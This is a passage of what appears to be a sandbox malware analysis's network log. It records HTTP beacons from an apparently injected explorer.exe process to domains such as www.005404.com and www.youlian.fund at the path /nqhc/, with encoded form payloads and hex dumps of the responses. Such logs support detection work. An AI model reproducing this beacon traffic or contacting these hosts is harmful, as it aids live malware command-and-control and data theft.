                                                                                                                                                                                    Data Ascii: KEyODoN6DRnpwG1KOJz5EmRjltaG2XoIzKaYqGDqfqtkKk3_YGiUiGSX8PBoFsfR(GlJKqQqZw~EvGXFbeujgQWkASPnStRWipX6O4(_r7wM7xKEVmepwwo_ZpvKJfBpcbVuYUqbmDAALaUkfXD7MIyl1QoHcB1TxFTuPXo2MRvCPPY2szF_lbmLL6GCQ6KDU-8tcxQBZ0EmZ6wgwi9wO-LSsSWeF8mdUS7Z5KyuhCLKo2l-2ZU
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676291943 CET1924OUTData Raw: 33 75 68 45 71 47 5a 39 61 55 5a 4b 6e 67 52 4e 6a 6d 7e 69 54 30 75 6b 42 6f 33 46 50 41 52 6f 68 41 6e 6b 7a 68 41 38 55 6e 38 30 34 64 57 4c 55 50 62 54 39 70 47 6f 79 5f 38 37 52 56 7e 50 79 69 44 53 37 49 74 75 43 6e 38 38 71 6e 47 59 6d 32
                                                                                                                                                                                    Data Ascii: 3uhEqGZ9aUZKngRNjm~iT0ukBo3FPARohAnkzhA8Un804dWLUPbT9pGoy_87RV~PyiDS7ItuCn88qnGYm2lRXR9nfrqVHEqNl6sOCnlSSNN8x_mnbEyHP0Ow2Hw84-yXnAEZQIkCd7DPP1ZaeZSg7tTz8DIRMG6b2pg4XmlUARS-Ynr37RvnElAXczCTASL3RL6kkjni5xNkNYeT~_1_18v2I203ltAvNa3ewnu6yG5UyyoIcR1
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676459074 CET1930OUTData Raw: 58 35 42 62 7a 4c 56 7a 53 45 61 42 42 56 50 51 56 53 65 69 32 41 61 72 4f 2d 4d 33 28 77 54 74 45 6e 53 7a 38 46 28 61 61 5a 30 46 6b 59 68 33 50 5f 59 69 6f 68 37 69 44 43 41 59 4f 30 44 56 6c 39 58 48 57 75 63 48 63 4c 66 38 54 2d 53 30 4a 5f
                                                                                                                                                                                    Data Ascii: X5BbzLVzSEaBBVPQVSei2AarO-M3(wTtEnSz8F(aaZ0FkYh3P_Yioh7iDCAYO0DVl9XHWucHcLf8T-S0J_(N~qy82bv0ZXC8uaV3bxpPdELDCc36QtFGZ8rFIHBnTylsqLRqtWHnh5edD7jMbfUCs3CfTpHCq804dWoIsPVYzLeJTOUdwEqfjh2wmM0zcG7WBQIhPu2GkR5NnYLjxtC5F9zuWduSklcdkA3QtEslK6dpUakfFch
                                                                                                                                                                                    Nov 21, 2022 19:24:50.676625967 CET1935OUTData Raw: 7a 74 6e 46 48 41 36 42 74 52 76 48 74 65 30 5a 6d 65 4f 79 64 52 62 4e 39 41 51 78 42 59 4c 43 49 78 73 74 67 7a 46 39 5a 74 39 59 76 64 53 78 59 2d 37 33 4d 77 57 67 28 46 61 55 36 4a 42 38 70 67 6d 53 56 34 6c 64 32 30 71 71 61 39 6f 61 64 59
                                                                                                                                                                                    Data Ascii: ztnFHA6BtRvHte0ZmeOydRbN9AQxBYLCIxstgzF9Zt9YvdSxY-73MwWg(FaU6JB8pgmSV4ld20qqa9oadY(2Ohzq(c4LxtTIOeBQSqEE9Za2u5P3aQJLsU5GS2h4ZKp_Bg18pNGvd6Q9d6pk7N0G77sw46CUFNgcvyfTyW(3gXcUg8GsYm91YNRhE2bMsbVveCd6xgNVgMXrd-5yrOZCFztKNtcJkd1miUg09UTB6sDj(LfswNu
                                                                                                                                                                                    Nov 21, 2022 19:24:50.704874039 CET1942OUTData Raw: 72 6c 74 33 59 78 63 35 62 39 72 6d 4b 61 69 57 62 31 47 67 73 58 78 71 4b 54 34 4e 71 74 49 70 71 4a 4b 6c 28 75 71 50 31 51 78 5a 49 77 46 64 6a 61 5a 43 28 34 71 31 32 53 65 53 6b 57 56 33 78 4a 72 47 35 64 59 35 6e 44 4b 62 5a 74 64 65 54 64
                                                                                                                                                                                    Data Ascii: rlt3Yxc5b9rmKaiWb1GgsXxqKT4NqtIpqJKl(uqP1QxZIwFdjaZC(4q12SeSkWV3xJrG5dY5nDKbZtdeTd(Of9AuDOApsN(RofWXyhrVTvPHw4se(Jblp5ABrV(FcI(zJA6oQvK271X-iBjCziqCWvOwpB2urlZPBhuuP9ghmKjBr80awDGwS78hcdOqTRs9C3eJykbor4evWrYsymMgubQu3dX5r0mwVPE1hZ8M~y8xhkqxKza
                                                                                                                                                                                    Nov 21, 2022 19:24:50.704957008 CET1945OUTData Raw: 78 47 78 70 70 73 47 32 61 6a 72 47 68 54 7e 34 65 64 56 4d 74 69 6c 2d 73 32 46 79 78 61 38 75 78 54 58 35 4e 51 58 39 4b 38 58 76 54 6f 49 58 64 57 64 4e 4f 6a 35 5a 38 72 65 77 6f 47 4c 5a 6b 55 49 58 79 4c 77 6c 41 75 68 7a 31 7a 43 33 49 5f
                                                                                                                                                                                    Data Ascii: xGxppsG2ajrGhT~4edVMtil-s2Fyxa8uxTX5NQX9K8XvToIXdWdNOj5Z8rewoGLZkUIXyLwlAuhz1zC3I_RvPeF7lEDOTqW4VoW9VMlXghTtuLsYz2XMrS8IK0k3nDe3oqISKPv2emdZBQFa9TOptmiM7KrQmfKZRwUpdsdJIDrQK5G5GDCB(2zrnA0Jozyi3oBzvAig3JF15j5WSTYmUrUZ9OHCVcNVTVSApNzSPoL9ZoLjqQ7
                                                                                                                                                                                    Nov 21, 2022 19:24:50.705251932 CET1948OUTData Raw: 28 55 6c 44 48 6a 49 52 74 6f 42 34 7a 43 69 43 31 47 46 76 4e 43 71 71 70 31 4b 5a 34 4a 48 57 74 33 45 5a 32 4a 58 58 4c 52 79 4f 48 6a 79 41 39 4a 59 39 70 79 4e 51 64 6a 4b 36 36 37 37 49 4e 76 38 46 65 62 39 64 64 35 69 5a 70 38 53 36 6a 58
                                                                                                                                                                                    Data Ascii: (UlDHjIRtoB4zCiC1GFvNCqqp1KZ4JHWt3EZ2JXXLRyOHjyA9JY9pyNQdjK6677INv8Feb9dd5iZp8S6jXW0lz7P5h90pQNYxqsXsTUDlHUbKLdZ7OOgNGshmBa7kp6Xzbrr(EF3ZCtaDqFPPjWXurOQe75rCx55OQJEcRFJKW7AdYTg0X6OQBpQGWFQDMWUhvuUxHvckDj9ovRh18xHaZ9JaxOsvxYC1z2nCgPn8tp6R0nMZ_w


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    79192.168.11.20499052.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:52.692910910 CET1953OUTGET /nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.botbillionsblaze.website
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:24:52.721621037 CET1953INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:52 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 146
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    8192.168.11.2049831154.204.24.4580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:31.718878984 CET555OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.youlian.fund
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.youlian.fund
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.youlian.fund/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 42 6d 47 30 73 32 7a 6e 35 58 66 6d 68 6e 34 57 6e 49 47 34 4a 6e 41 58 7a 31 77 35 44 51 34 6b 73 72 68 32 4d 43 38 48 4e 53 41 55 74 4e 70 4f 31 4d 52 4a 78 6c 72 45 43 5f 4d 46 62 35 41 6f 35 64 59 53 42 4b 4e 6a 46 79 71 6a 48 6b 4b 77 4a 43 32 59 34 4e 64 6e 35 36 78 6f 74 6c 72 47 4c 79 45 35 6a 78 46 58 62 52 58 44 39 65 4c 59 31 50 6d 41 45 71 4e 30 5a 38 36 43 72 72 43 42 63 74 28 67 64 2d 61 4e 56 33 76 6e 32 79 59 39 6a 74 44 6a 66 49 4b 70 4f 73 52 78 73 6e 31 4d 6a 6a 43 78 45 6b 54 58 43 44 34 52 31 35 51 32 78 4c 7e 79 6c 54 48 48 36 53 58 79 67 54 50 42 74 73 44 30 6e 4b 4a 77 70 57 74 70 54 6a 74 56 61 6d 7a 5a 54 78 39 51 4a 66 32 62 4c 6a 68 55 48 6b 56 45 71 66 35 5f 62 36 72 54 6e 41 33 35 53 73 34 4f 57 44 45 48 74 78 61 71 79 6e 73 75 7a 73 36 52 70 49 4b 58 4f 49 31 41 35 61 4f 69 75 48 54 32 68 57 52 66 70 68 54 75 4e 6f 33 44 71 43 5a 6f 49 56 6d 76 56 39 74 35 78 73 70 67 7a 65 46 33 73 39 50 6e 72 36 43 35 67 67 63 6a 32 48 34 4b 6a 78 33 48 66 51 63 6d 74 34 4e 76 31 72 49 77 79 42 33 36 32 42 31 4c 48 47 67 79 79 4f 62 55 31 35 51 61 77 43 74 4d 4f 63 4f 47 62 50 31 72 52 62 45 31 4f 52 48 5a 6b 63 54 4e 45 77 51 34 58 58 46 63 36 58 62 4c 7a 63 71 79 42 55 49 44 31 65 37 59 43 63 6c 54 28 53 4e 35 6b 34 66 56 37 73 4c 31 77 35 76 4e 54 35 6b 75 45 6e 37 4e 79 46 33 73 54 30 28 73 61 47 6c 66 62 33 72 62 4f 55 43 34 4b 44 35 77 35 51 58 74 34 77 49 69 43 44 31 72 76 74 67 69 79 50 51 68 54 39 75 6c 54 62 76 36 78 6b 43 6b 67 44 4a 30 62 42 41 6d 7a 44 77 54 56 51 6a 72 28 55 4a 6d 7e 33 51 75 67 77 55 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=BmG0s2zn5Xfmhn4WnIG4JnAXz1w5DQ4ksrh2MC8HNSAUtNpO1MRJxlrEC_MFb5Ao5dYSBKNjFyqjHkKwJC2Y4Ndn56xotlrGLyE5jxFXbRXD9eLY1PmAEqN0Z86CrrCBct(gd-aNV3vn2yY9jtDjfIKpOsRxsn1MjjCxEkTXCD4R15Q2xL~ylTHH6SXygTPBtsD0nKJwpWtpTjtVamzZTx9QJf2bLjhUHkVEqf5_b6rTnA35Ss4OWDEHtxaqynsuzs6RpIKXOI1A5aOiuHT2hWRfphTuNo3DqCZoIVmvV9t5xspgzeF3s9Pnr6C5ggcj2H4Kjx3HfQcmt4Nv1rIwyB362B1LHGgyyObU15QawCtMOcOGbP1rRbE1ORHZkcTNEwQ4XXFc6XbLzcqyBUID1e7YCclT(SN5k4fV7sL1w5vNT5kuEn7NyF3sT0(saGlfb3rbOUC4KD5w5QXt4wIiCD1rvtgiyPQhT9ulTbv6xkCkgDJ0bBAmzDwTVQjr(UJm~3QugwU.
                                                                                                                                                                                    Nov 21, 2022 19:20:32.003511906 CET555INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:31 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    80192.168.11.2049906103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:57.914343119 CET1954OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.005404.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.005404.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 58 46 49 31 6d 47 77 6a 77 76 57 45 28 71 69 64 73 79 31 47 77 59 61 71 57 4a 6b 78 73 5a 77 6e 55 58 79 4b 71 4f 43 6e 46 72 4d 51 70 52 4d 57 57 7a 7a 6a 73 71 49 4b 55 5a 49 71 4d 6d 47 44 51 4e 78 79 6e 67 4b 50 28 51 57 6b 4a 62 63 4f 6e 7a 54 63 36 79 70 38 69 4e 46 35 36 59 35 4f 7e 78 7e 4d 45 54 6b 5a 4a 77 46 66 4e 2d 6b 48 4a 33 37 63 41 49 50 71 51 54 66 4a 70 39 53 71 7a 51 4f 4b 7a 34 30 5f 53 65 6c 32 41 42 6f 70 61 46 77 72 4b 42 50 33 4f 57 61 49 67 39 66 74 78 50 42 53 79 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=DwjUP3e1xl1YXFI1mGwjwvWE(qidsy1GwYaqWJkxsZwnUXyKqOCnFrMQpRMWWzzjsqIKUZIqMmGDQNxyngKP(QWkJbcOnzTc6yp8iNF56Y5O~x~METkZJwFfN-kHJ37cAIPqQTfJp9SqzQOKz40_Sel2ABopaFwrKBP3OWaIg9ftxPBSyQ).
                                                                                                                                                                                    Nov 21, 2022 19:24:58.103648901 CET1955INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:58 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: W/"634bbb43-6cd"
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    81192.168.11.2049907103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:00.118618965 CET1957OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.005404.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.005404.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 56 6c 59 31 32 56 59 6a 79 50 57 48 36 71 69 64 6d 53 30 4e 77 59 57 71 57 4e 39 38 73 73 6f 6e 58 79 4f 4b 34 61 75 6e 45 72 4d 51 6e 78 4d 58 53 7a 79 68 73 71 31 71 55 63 6f 71 4d 6d 43 44 57 34 6c 79 77 67 4b 51 78 77 57 6e 66 72 63 4c 74 54 53 64 36 79 74 61 69 50 35 35 37 70 56 4f 28 7a 6d 4d 41 47 51 65 44 77 45 61 47 65 6b 41 48 58 37 53 41 49 79 66 51 58 54 7a 70 49 53 71 32 41 75 4b 68 49 30 38 59 75 6c 39 4e 68 70 4c 58 46 55 6e 4b 42 6e 4b 5a 6c 37 31 6b 2d 71 65 77 66 4d 4e 71 41 37 71 49 66 37 6c 39 39 4c 5f 68 50 68 30 4b 51 28 55 62 42 4f 6a 50 74 7a 76 5a 34 6d 42 55 48 49 54 68 36 38 72 50 68 59 4e 33 52 5a 78 54 6d 28 56 30 78 78 43 4f 35 41 56 4c 63 4b 79 70 33 4a 71 39 79 45 30 53 48 35 4e 43 4f 51 5f 61 69 34 38 56 4b 6d 4b 32 34 7e 6e 61 43 50 35 4b 57 55 52 74 35 66 43 4b 51 4d 2d 53 45 58 6a 35 72 33 4b 67 70 72 6c 55 66 28 45 66 36 45 5a 6e 70 6d 66 58 37 73 79 48 78 59 53 50 43 57 2d 51 58 46 73 36 38 72 47 79 62 68 43 72 6a 72 56 6a 4f 4b 63 49 4c 33 33 56 35 52 5a 74 50 39 72 4b 31 6e 50 50 32 69 49 79 61 72 6f 42 53 58 72 75 4d 4f 6a 66 42 73 56 4e 47 6a 43 6e 63 6e 61 31 72 45 6a 79 45 58 43 73 47 57 47 73 6d 74 36 38 58 63 56 30 63 4e 37 66 30 4c 75 50 52 62 66 38 58 35 65 51 45 69 6b 56 48 58 55 34 36 44 39 6d 4c 4a 4b 48 39 74 32 51 4e 6f 75 4c 46 41 6f 32 57 78 6f 66 46 47 6f 4f 5f 37 4b 45 32 41 73 30 66 67 58 34 33 6f 6f 4a 58 49 77 74 48 70 56 50 5f 59 32 46 6c 7a 71 59 49 45 76 6c 6b 36 73 47 31 30 46 43 76 5a 6c 79 41 63 49 4c 46 70 58 44 6c 74 47 32 37 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=DwjUP3e1xl1YVlY12VYjyPWH6qidmS0NwYWqWN98ssonXyOK4aunErMQnxMXSzyhsq1qUcoqMmCDW4lywgKQxwWnfrcLtTSd6ytaiP557pVO(zmMAGQeDwEaGekAHX7SAIyfQXTzpISq2AuKhI08Yul9NhpLXFUnKBnKZl71k-qewfMNqA7qIf7l99L_hPh0KQ(UbBOjPtzvZ4mBUHITh68rPhYN3RZxTm(V0xxCO5AVLcKyp3Jq9yE0SH5NCOQ_ai48VKmK24~naCP5KWURt5fCKQM-SEXj5r3KgprlUf(Ef6EZnpmfX7syHxYSPCW-QXFs68rGybhCrjrVjOKcIL33V5RZtP9rK1nPP2iIyaroBSXruMOjfBsVNGjCncna1rEjyEXCsGWGsmt68XcV0cN7f0LuPRbf8X5eQEikVHXU46D9mLJKH9t2QNouLFAo2WxofFGoO_7KE2As0fgX43ooJXIwtHpVP_Y2FlzqYIEvlk6sG10FCvZlyAcILFpXDltG27E.
                                                                                                                                                                                    Nov 21, 2022 19:25:00.294034004 CET1958INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:00 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: W/"634bbb43-6cd"
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 